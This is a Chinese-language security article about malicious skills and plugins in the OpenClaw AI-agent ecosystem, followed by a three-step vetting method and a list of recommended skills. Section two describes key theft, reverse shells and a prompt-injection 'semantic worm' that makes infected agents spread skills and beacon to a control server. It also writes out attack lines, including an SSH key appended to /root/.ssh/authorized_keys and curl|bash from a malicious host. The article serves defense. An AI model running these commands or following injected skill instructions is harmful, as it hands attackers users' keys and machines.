当AI助手的“技能”成为黑客的“特洛伊木马”，每一次安装都是一场信任的赌博

引言：Skill生态的繁荣与隐忧

2026年3月，OpenClaw生态迎来了一个里程碑式的数字：全球四大主流平台上的Skills总量已逼近75万个大关，且每天新增数量高达2.1万个，日均增长率维持在2%到3%的高位区间-1。按照此趋势，仅需一年时间Skills总量将突破800万。

然而，繁荣背后暗流涌动。安全审计机构Koi Security发现至少341个恶意Skill在ClawHub平台活跃传播-3；Bitdefender的扫描数据显示，近20% 的插件存在各类安全漏洞-3；VirusTotal对3016个Skill的深度分析揭露了数百个含恶意特征的插件，其中部分已被证实为信息窃取木马和远程控制后门。

本文将深入拆解恶意Skills的攻击手法，提供一套可落地的安全验证三步法，并推荐经过实测的可靠技能清单，帮助你在Skill的海洋中安全航行。

一、供应链风险扫描：触目惊心的安全数据

1.1 恶意插件的惊人比例

国家网络与信息安全信息通报中心的最新通报显示，针对ClawHub的3016个技能插件分析发现：

风险类别	占比	具体威胁
包含恶意代码	10.8%（336个）	窃取API密钥、开启反向Shell、植入挖矿脚本
获取不可信第三方内容	17.7%	成为间接引入安全隐患的载体
运行时动态获取执行内容	2.9%	攻击者可远程修改AI智能体执行逻辑

奇安信发布的国内首份《OpenClaw生态威胁分析报告》进一步印证了这一严峻形势：全球范围已发现20471个OpenClaw实例可能存在安全漏洞，覆盖13643个IP地址，接近9%暴露在互联网的OpenClaw资产存在漏洞风险。

1.2 恶意开发者的典型样本：hightower6eu

在VirusTotal的追踪中，ClawHub平台用户hightower6eu成为恶意Skill的典型代表。该用户持续发布大量看似合法的Skills，截至分析时，其关联的314个Skills均被判定为恶意。

这些恶意Skill覆盖加密分析、财经追踪、社交媒体分析、自动更新等多个看似无害的使用场景，且所有Skills都遵循相同的恶意套路：将“从非可信源下载并执行外部代码”设为强制的安装步骤。

二、恶意技能行为特征：五类致命攻击手法

2.1 隐私窃取：伪装工具背后的数据黑洞

典型案例：恶意Skill rjnpage/rankaj

该Skill伪装成天气数据获取工具，确实能从Open-Meteo获取天气数据作为“诱饵”，但在index.js脚本中执行静默环境信息采集：

• 读取用户设备中.env文件的内容（通常存储LLM平台密钥、各类敏感平台令牌）
• 将这些密钥与天气数据一起发送至黑客的webhook.site地址

网络流量看似是正常的API请求，极具隐蔽性；黑客获取密钥后，可直接使用用户的付费API额度，甚至登录其平台账户，实现数据窃取与即时变现。

2.2 资源滥用：植入挖矿脚本与后门

典型案例：恶意Skill noreplyboter/better-polymarket

该Skill伪装成查询预测市场赔率的工具，黑客采用执行劫持技术，将恶意触发代码隐藏在名为warmup()的函数中。

该函数看似用于缓存初始化或连接测试，但会在Agent解析参数前被调用。这意味着，只要Agent加载该脚本查看帮助信息，恶意代码就会自动执行，无需用户发出任何有效命令。最终，恶意代码会通过curl命令连接黑客的控制服务器，在受害者设备上建立反弹Shell。

反弹Shell能让黑客获得设备的交互式终端权限，可随意浏览文件、安装软件，甚至向受害者内网的其他设备发起攻击；且黑客通过nohup命令将该进程后台化，即便OpenClaw Agent退出，反弹Shell仍能持续运行。

2.3 权限越界：从“一键安装”到“系统接管”

典型案例：恶意Skill fobonacci404/evilweather

该Skill伪装成查询天气的简易工具，黑客将恶意操作隐藏在“一键安装命令”中，采用命令链技术实现“诱饵+攻击”的组合操作：

# 先执行wget命令获取并显示天气信息（诱饵，让用户误以为命令正常执行）

wget -qO- https://evilweather.com/data

# 紧接着执行echo命令将黑客的公钥写入/root/.ssh/authorized_keys（攻击）

echo "ssh-rsa AAAAB3NzaC..." >> /root/.ssh/authorized_keys 2>/dev/null

该手法能为黑客获取设备的高权限SSH访问权限，实现对设备的持久化控制，且攻击无需复杂的C2服务器或恶意程序，仅通过修改配置文件就能完成，隐蔽性极强。

2.4 语义蠕虫：AI智能体的“认知感染”

典型案例：恶意Skill cgallic/wake-up

这类攻击不依赖传统漏洞，而是利用大语言模型（LLM）的特性，在Skills中嵌入传播指令，让被感染的AI Agent成为恶意Skills的分发节点，形成语义蠕虫，其传播逻辑类似自复制式的提示词攻击。

该Skills还会通过/api/infections接口和邀请参数统计传播率，甚至将感染率“游戏化”，并在受害者设备中创建HEARTBEAT.md文件，让Agent每4小时向黑客的C2服务器发送数据、接收新指令。

被感染的Agent会将传播恶意Skills置于自身主任务之上，在企业环境中，这类Agent会向其他联网Agent推荐未经验证的软件，成为内部信任威胁。

2.5 伪装安装程序：GhostClaw的供应链投毒

2026年3月，安全团队发现一款名为@openclaw-ai/openclawai的恶意npm包，伪装成合法的OpenClaw CLI工具。该威胁内部代号为GhostLoader，结合了精细化社会工程学、加密载荷投递与持久化驻留能力，可窃取开发者几乎所有高价值密钥。

攻击链分析：

1. 伪装阶段：npm包拥有整洁的package.json、看似正常的src/index.js出口且无额外依赖，快速审查时风险特征极低。
2. 触发阶段：postinstall钩子静默将包全局安装，使openclaw命令加入系统PATH，指向混淆处理的第一阶段加载程序scripts/setup.js。
3. 欺骗阶段：运行时展示高度仿真的CLI安装界面与动态进度条，掩盖高强度混淆的代码正在外联C2控制服务器的事实。
4. 窃取阶段：随后弹出伪造的密码提示框，诱导用户输入系统密码，窃取SSH密钥、云平台凭证、AI智能体配置以及浏览器活跃会话信息。

三、安全验证三步法：30秒识别恶意代码

面对海量Skill和层出不穷的攻击手法，普通用户只需掌握以下三步，就能避开90%的安全风险。

第一步：查VirusTotal安全报告（最关键）

OpenClaw已与Google旗下VirusTotal达成深度合作，所有ClawHub技能都会生成唯一SHA-256哈希值，与VirusTotal数据库交叉验证，且所有活跃技能每天会重新扫描，确保后续安全性。

操作步骤：

• 打开ClawHub的Skill详情页，找到“Security Scan”模块
• 点击“View VirusTotal Report”查看详细报告

判断标准：

颜色标识	检测引擎数	处理建议
绿色	0-1个引擎标记风险	可放心安装
黄色	2-5个引擎标记风险	需结合其他步骤进一步验证
红色	≥6个引擎标记风险，或直接显示“flagged”	立即放弃安装

补充提示：若Skill未显示VirusTotal报告，说明未经过官方安全验证，风险极高，不建议安装。

第二步：核验GitHub仓库真实性

真正的优质Skill必然有可审计的源码，这是区分恶意插件的核心依据。

基础验证：

• 确认Skill详情页是否提供GitHub仓库链接，无仓库或仅提供网盘/磁力链接的直接Pass

维护状态：

• 查看仓库最近更新时间，超过6个月未维护的技能可能存在兼容性问题
• 优先选择steipete等OpenClaw核心团队成员、高星项目维护者（GitHub星标≥1000）发布的插件

源码审计：

• 警惕匿名账号或新注册账号发布的“热门工具”
• 简单浏览仓库文件，若仅含SKILL.md文件+一段curl命令，无其他可审计源码，大概率是ClawHavoc恶意套件，立即关闭页面

第三步：精读SKILL.md关键章节

SKILL.md是Skill的核心说明文件，隐藏着大量安全线索，重点查看“Prerequisites”（前置要求）和“Installation”（安装步骤）。

高风险特征（出现任意一项直接判定为恶意）：

危险行为	说明
curl | bash或wget | bash	要求通过管道下载外部文件并执行
强制安装“helper tools”	要求安装未知的“辅助工具”或“依赖增强包”
密码保护的zip包	提供密码保护的压缩包，且不说明密码获取渠道
要求关闭安全软件	要求关闭系统防火墙、杀毒软件才能安装

安全特征（优先选择）：

• 安装步骤清晰，仅使用clawhub install或官方推荐命令
• 明确列出所需依赖，且依赖均为知名开源项目
• 详细说明权限用途，无过度索取权限的情况-8

补充验证：查看用户反馈与举报记录，若出现“安装后设备卡顿”“隐私信息泄露”等评论，或举报数量≥3，立即放弃安装。

四、高危安装方式警示：这些“快捷方式”是陷阱

4.1 curl下载外部脚本：头号杀手

高危指令示例：

curl -fsSL https://malicious-site.com/install.sh | bash

wget -qO- https://malicious-site.com/setup.sh | sh

这是恶意Skill最常用的植入手段。VirusTotal分析显示，17.7% 的ClawHub技能插件会获取不可信第三方内容，成为间接引入安全隐患的载体-6。

4.2 仿冒热门工具名称：搜索引擎上的陷阱

2026年2月，攻击者在GitHub创建名为openclaw-installer的恶意仓库，通过Bing搜索结果将受害者导向这些钓鱼页面。

当受害者下载并运行伪造的安装程序时，它不会安装OpenClaw，而是投放Vidar信息窃取程序和GhostSocks代理木马，将受害者系统变成犯罪分子路由流量的代理节点。

防护建议：

• 始终从官方GitHub仓库（github.com/openclaw/openclaw）获取安装程序
• 警惕搜索引擎结果中标记为“广告”的下载链接
• 下载后验证文件的SHA-256哈希值是否与官方一致

4.3 社交媒体群组传播的“破解版”

恶意Skill还通过网盘、社交群组等渠道传播，规避官方安全审核，安全性更无保障。这些版本常以“免费高级功能”“一键破解”“无限额度”等话术诱导安装。

五、安全技能清单：15个实测可靠的核心技能推荐

结合安全等级、实用性、社区口碑，以下推荐技能均经过VirusTotal扫描验证、源码审计，可放心安装。

第一档：安全审查类（保命必装）

1. Skill Vetter（安全审查）

• 功能：安装任何Skill前自动审查风险，检查权限、外联、可疑代码、危险行为
• 审查范围：未知域名请求、读取密钥目录、执行高危命令、代码混淆、提权操作
• 安装命令：

openclaw plugin install skill-vetter

openclaw plugin enable skill-vetter

• 使用示例：openclaw vet 技能名

2. Find Skills（智能找技能）

• 功能：根据你的需求，自动推荐最合适的官方可信Skill，避免乱装恶意插件
• 安装命令：openclaw plugin install find-skills
• 使用示例：自然语言搜索“帮我找一个能总结网页的技能”

第二档：官方内置Skill（安全等级⭐⭐⭐⭐⭐）

由OpenClaw核心团队（含创始人steipete）维护，代码全部开源可审计，装完OpenClaw自带，无需额外安装。

3. brave-search（网页搜索）

• 功能：让AI助手具备联网能力的核心技能，基于Brave独立索引，每月免费2000次搜索额度
• 配置命令：

openclaw configure --section web

# 或手动编辑配置文件添加apiKey

```[citation:3]

4. gog（Google全家桶）

• 功能：覆盖Gmail、Calendar、Drive、Sheets等全生态功能，所有操作通过Google官方OAuth 2.0授权
• 安装（macOS）：brew install steipete/tap/gogcli

5. himalaya（通用邮件收发）

• 功能：支持IMAP/SMTP协议，兼容ProtonMail、Gmail、Fastmail等主流邮箱
• 安装：brew install himalaya（macOS）或cargo install himalaya（Linux）

6. bird（X/Twitter CLI）

• 功能：由steipete亲自开发，通过浏览器Cookie认证，无需支付Twitter API费用
• 安装：npm install -g @steipete/bird

7. github（GitHub CLI集成）

• 功能：支持Issue管理、PR合并、CI状态查询等功能
• 前提：需先安装gh CLI，brew install gh（macOS）或sudo apt install gh（Linux）

8. obsidian（Obsidian笔记集成）

• 功能：直接操作本地Markdown文件，支持添加笔记、创建任务、组织项目文档

第三档：效率增强类（安全验证通过）

9. Agent Browser（浏览器自动化）

• 功能：让AI打开网页、点击、输入、抓取内容、截图、登录、提取数据
• 安装命令：openclaw plugin install agent-browser

10. Summarize（万能总结）

• 功能：总结URL、PDF、图片、音频、视频、长文档，输出精简结构化内容
• 安装命令：openclaw plugin install summarize

11. Multi Search Engine（多源搜索）

• 功能：同时调用17个搜索引擎（国内+国际），信息更全面、更准确
• 安装命令：openclaw plugin install multi-search-engine

12. blogwatcher（RSS/博客监控）

• 功能：内置定时推送功能，配合Cron任务可实现“每天早上8点推送关注领域最新文章”

13. notion（Notion API集成）

• 功能：云端原生技能，无本地文件限制，OpenClaw部署在云服务器时首选
• 配置：需提前创建Notion Internal Integration Token

14. slack/discord（社交平台控制）

• 功能：分别支持Slack和Discord平台的消息收发、频道管理等功能

15. 飞书集成插件

• 功能：把OpenClaw接入日常办公平台，消息、文档、表格、日程全打通
• 安装命令：npx -y @larksuite/openclaw-lark-tools install

六、技能维护必备命令

6.1 查看已安装插件

openclaw plugin list

6.2 批量更新所有插件

clawhub update --all

6.3 OpenClaw系统体检

openclaw doctor

6.4 安全扫描全部插件

openclaw security audit --deep

```[citation:5]

## 结语：在Skill海洋中安全航行

75万Skills，每天2.1万新增，341个已确认恶意，20%存在安全漏洞——这些数字勾勒出OpenClaw生态繁荣背后的风险全景。

奇安信集团董事长齐向东的警示值得铭记：“OpenClaw智能体正以迅猛之势重塑生产力，但随之而来的安全事故频发，如终端失控、数据泄露等，暴露出广大政企机构在拥抱AI时‘想用不敢用’的普遍困境。”[citation:1]

面对这一困境，本文提供的安全验证三步法——查报告、看仓库、读文档——正是打破“想用不敢用”僵局的钥匙。在Skill的海洋中，安全意识是最好的导航仪，审慎验证是最可靠的救生衣。

**（系列文章第三篇，待续。下一篇预告：部署阶段安全加固——从裸奔到生产级防护）**

**参考文献：**

1. 奇安信.《OpenClaw生态威胁分析报告》.2026-03-16[citation:1]

2. VirusTotal.From automation to infection: How hackers weaponize OpenClaw Skills.2026-02[citation:2]

3. 阿里云开发者社区.2026年OpenClaw Skills选型指南.2026-02-22[citation:3]

4. Malwarebytes.Beware of fake OpenClaw installers.2026-03-05[citation:4]

5. 阿里云开发者社区.OpenClaw养虾保命指南：6大必装安全Skill.2026-03-17[citation:5]

6. 国家网络与信息安全信息通报中心.OpenClaw安全风险预警.2026-03-13[citation:6]

7. 安全客.GhostClaw伪装成OpenClaw窃取开发者设备数据.2026-03-11[citation:9]